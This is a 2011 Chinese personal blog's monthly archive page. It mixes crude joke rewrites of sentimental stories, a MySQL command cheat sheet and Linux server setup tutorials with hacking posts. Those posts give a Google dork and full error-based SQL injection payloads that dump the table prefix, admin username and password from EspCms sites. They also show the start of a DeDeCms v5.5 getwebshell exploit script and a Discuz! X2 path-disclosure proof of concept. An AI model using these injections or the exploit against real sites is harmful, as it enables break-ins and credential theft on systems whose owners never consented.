存档

2011年11月 的存档

一句话,就毁掉一个小清新段子 !

2011年11月30日 4 条评论

从 我们爱讲冷笑话 作者:易水寒 

 

寒冬早晨,她下夜班回来发现他居然还赖在床上。她想着自己的辛苦,忍不住歇斯底里起来。他什么也没说,起来去厨房端出早已准备好的早饭,急急忙忙上班去了。她流着委屈的泪水,吃饭洗漱…当她躺下的时候,觉得被窝里暖暖地存着他的热量,才想起刚才他一直躺在她这边,忍不住又哭了。

毁:然后她拿出手机拨了一个再熟不过的电话:过来吧~他上班去了~

———————————————————-

老友相见,他们谈笑风生。他随意玩弄她的手机,一愣,“几年前的短信你居然还留着。”她抢过手机,“你没心没肺甩了我,我留着这些甜言蜜语日后调侃你还不行吗?”饭后,他自先离开。她安静地翻出短信一条条认真看,喃喃自语:“我只是需要些证据,证明即便分开,你也有过那么爱我的时候…”

毁:说完她就对着短信撸了起来。

———————————————————-

十年婚姻走到尽头。她坐上时空穿梭机,回到他们举行婚礼那天,待嫁新娘的自己满脸幸福,她狠下心说未来的生活并不幸福,那时的她泪流满面。回程后是预料的空荡,她无力坐下,结束了…身后门锁轻响,他熟悉的脸带着些许疲惫出现在她面前,她忽地哭了。原来爱,是即便知道结局,仍义无反顾。

毁:他一脸惊讶。“你?你怎么会在我家?”他后面跟着进来一连鬓络腮胡大汉。对他说:“老公,她是谁啊?”———————————————————-

新婚姻法让她很没安全感。于是,他把所有产权转到她名下。公园散步时他故意逗她,装着委屈说,好了现在轮到我担心净身出户了。她很是得意洋洋,对啊,房子车子孩子都是我的!他撅起嘴,用小男孩似的无辜眼神望着妻子。她俏皮地笑了,轻靠在他肩膀上娇嗲地说,可我是属于你的呀,傻瓜。

毁:突然她睁开眼睛。原来是鼾声把她吵醒了。于是她想到儿子的毒资和丈夫的赌资还没远远不够,于是无奈摇醒了旁边的客人并催其快点穿衣服。对门外喊到:下一个!

———————————————————- 阅读全文…

分类: 情感生活 标签:

Mysql常用操作整理

2011年11月29日 2 条评论
一、数据库管理

1、启动/关闭Mysql
mysql_safe -user=mysql&
mysqladmin -p shutdown

2、修改root口令
mysqladmin -u root -p password '新密码'

3、查看服务器状态
mysqladmin version -p

4、连接mysql
mysql -u用户名 -p 连接本机
mysql -h 远程数据库IP -u用户名 -p 连接远程mysql

5、在命令行执行数据库操作
mysql -uroot -p -e "sql语句"

二、用户管理

1、创建用户
mysql> grant select,insert,update,delete,alter on 数据库.* to 用户@localhost identified by "密码";
mysql> grant all privileges on *.* to 用户@"%" identified by "密码";
mysql> flush privileges;

2、修改用户
mysql> update user set password=password ('密码') where user="fuck"; #修改fuck密码为xxx
mysql> DELETE FROM user WHERE User="用户" and Host="localhost"; #删除用户帐号
mysql> SHOW GRANTS FOR user1; #显示创建user1用户的grant语句
3、

阅读全文…

分类: 技术文档 标签:

EspCms 网站系统注入漏洞

2011年11月29日 4 条评论

 

关键字:inurl:index.php?ac=article&at=read&did=

注入点(爆表前缀):index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,table_name,0x27,0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

爆用户名:
index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,username,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23)

爆密码:index.php?ac=search&at=taglist&tagkey=%2527,tags) or(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,password,0x27,0x7e)) from 前缀_admin_member limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

 

注意x号

分类: 网站安全 标签:

DeDeCms v5.5 Getwebshell Exploit

2011年11月29日 8 条评论
Exploit Code:
-----------分割线------------
<?php
print_r('
+----------------------------------------+
dedecms v5.5 final getwebshell exploit
+----------------------------------------+
');
if ($argc < 3) {
print_r('
+----------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to dedecms
Example:
php '.$argv[0].' localhost /dedecms/
+----------------------------------------+
');
exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);

阅读全文…

分类: 网站安全 标签:

Discuz! x2 物理路径泄漏

2011年11月29日 3 条评论
POC:
Google,
intext: discuz! x2 intitle:论坛- Powered by Discuz
http://bbs.xxx.com/source/function/function_connect.php
-------------------------------------------------------------
文件头部没有加:

if(!defined(‘IN_DISCUZ’)) {

exit(‘Access Denied’);

}

并且在头部包函了其他文件:

require_once libfile(‘function/cloud’);
-------------------------------------------------------------
临时解决办法:
修改function_connect.php 权限。

笨笨兔的故事–Linux入门小说

2011年11月23日 6 条评论
  •    觉得挺不错的一篇短小说,用另类且让人更容易接受的方式详细介绍了ubuntu的起始及使用方法,推荐刚刚接触Linux、或喜欢Linux的朋友读下。转载Ubuntu中文论坛,原文地址:http://forum.ubuntu.org.cn/viewtopic.php?t=162040
  • (1)开端 我叫Ubuntu,主人喜欢叫我“笨兔”,但是我绝对不笨,与某种耳朵长尾巴短的哺乳动物也没有什么联系,我是一个操作系统,我是一个linux,我是Ubuntu。 在今年(2008)的4月,我来到了这个世界,并由出生日期得到了自己的代号——8.04。当然,和我同一天出生的兄弟们还有很多,我只是其中之一。我们出生之后,每个人坐上一张被人们叫做“光盘”的碟子,奔赴世界各地,寻找自己的归宿。我们只有找到住处,才可以发挥我们的能力,而我们并不像人们一样,住在钢筋水泥的格子里面,我们住的地方,是一块叫做硬盘的空间。 住房的质量严重影响着我工作的效率,不过还好,我住的这个地方还不错,房子很宽敞,有500G大。不过不是我一个系统住,房子被隔成两个大屋子,每边 250G,我住在右边的一间,隔壁住的是一个WindowsXP,听说这家伙很厉害,不过我来的时候他正睡觉,于是也没有打招呼。(后来我知道,我们两个是不可能同时醒着的……)250G的屋子,对我来说实在是太宽敞了,我很欣慰,除了硬盘大之外,我发现这里其他的设施也是不错的。 硬盘只是我们操作系统休息和存放个人物品的地方,真正工作的时候,是不能在硬盘里的,那时候,我就需要从住的硬盘里,来到工作的地方,我们的工作间——内存。我的这个工作间也比较宽敞,有4G大,不过也不是我一个人用,也是要和隔壁的WdinowsXP共用的。鉴于他名字太长,我就管他叫“查皮”吧,不管他愿不愿意了,反正他也不知道,呵呵。不过内存的共用方式与硬盘不一样,不是一人一半,而是谁醒着谁就用,去睡觉前,一定要记得把内存里的东西,有用的,都搬回自己的那间硬盘里,以备下次使用。这道不光是为了另外一个系统着想,主要是因为内存里很不保险,东西放在里面去睡觉的话,等你在醒来,准没,不管你隔壁有没有住着一个查皮。
  • 阅读全文…

RHEL5从零打造个人Blog–Vsftp整合Mysql

2011年11月21日 3 条评论

前面把blog环境都配置好了,下面要上传blog程序了,怎么办呢?

一起来学习下Vsftpd整合Mysql,Let’s Go!

——————————————————————————————

由于之前已经安装过mysql-5.1.33,所以就不重新配置mysql了,具体看mysql篇

1、首先下载vsftpd-2.1.2.tar.gz

[root@localhost soft]# wget http://jafee.net/Soft/vsftpd-2.1.2.tar.gz

确认vsftpd需要的pam是否安装

[root@localhost soft]#rpm -qa | grep pam

pam_pkcs11-0.5.3-23
pam_ccreds-3-5
pam-0.99.6.2-6.el5_5.2
pam_passwdqc-1.0.2-1.2.2
pam_krb5-2.2.14-21.el5
pam_smb-1.1.7-7.2.1
pam-devel-0.99.6.2-6.el5_5.2
有红色部分即可....vsftpd需要的pam支持,之后和mysql整合会用到.

阅读全文…

分类: 技术文档 标签:

RHEL5从零打造个人Blog–Nginx优化及安全性设置

2011年11月21日 3 条评论

做完前两部分,现在已经可以上传blog并根据ip地址进行访问了。现在来做下Nginx的优化及安全配置,使服务器能更高效、安全的运行。

一、PHP优化

1.1 设置PHP FastCGI子进程数

这个要按照服务器的繁忙程度来计算,最好是得到详细的访问者日志后再进行调整。设置的值越大后台跑的php-cgi 进程就越多,这样排队速度就越快。反之就是越少就越慢。但是每一个php-cgi所耗费的内存在20M左右。我测试的server内存为1g,设置如下,

[root@localhost etc]#cd /usr/local/webserver/php/etc/

[root@localhost etc]#vi php-fpm.conf

找到  max_children  把值设置为15

<value name=”max_children”>15</value>

当然,如果服务器配置好,且浏览量大,设置到100以上最好。

1.2 增加 PHP-FPM 打开文件描述符的限制

[root@localhost etc]#vi php-fpm.conf
找到rlimit_files 把后边的值更改为 4096 或者更高.

Set open file desc rlimit
<value name="rlimit_files">65535</value>

[root@localhost etc]#php-fpm restart  //重启 PHP-FPM.

阅读全文…

普人特福的博客cnzz&51la for wordpress,cnzz for wordpress,51la for wordpress